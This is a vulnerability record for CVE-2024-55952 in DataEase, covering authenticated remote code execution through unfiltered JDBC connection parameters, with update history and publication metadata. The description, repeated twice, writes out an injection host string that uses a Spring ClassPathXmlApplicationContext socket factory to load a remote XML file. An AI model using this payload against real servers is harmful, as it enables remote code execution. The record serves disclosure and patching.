DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Metrics
Affected Vendors & Products
References
History
Thu, 20 Feb 2025 16:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
First Time appeared |
Dataease
Dataease dataease |
|
Weaknesses | NVD-CWE-noinfo | |
CPEs | cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* | |
Vendors & Products |
Dataease
Dataease dataease |
|
Metrics |
cvssV3_1
|
Wed, 18 Dec 2024 20:15:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Metrics |
ssvc
|
Wed, 18 Dec 2024 19:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |
Title | Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability | |
Weaknesses | CWE-20 | |
References |
| |
Metrics |
cvssV4_0
|

Status: PUBLISHED
Assigner: GitHub_M
Published: 2024-12-18T18:49:24.214Z
Updated: 2024-12-18T19:16:19.747Z
Reserved: 2024-12-13T17:47:38.371Z
Link: CVE-2024-55952

Updated: 2024-12-18T19:08:17.916Z

Status : Analyzed
Published: 2024-12-18T19:15:11.933
Modified: 2025-02-20T16:22:50.240
Link: CVE-2024-55952

No data.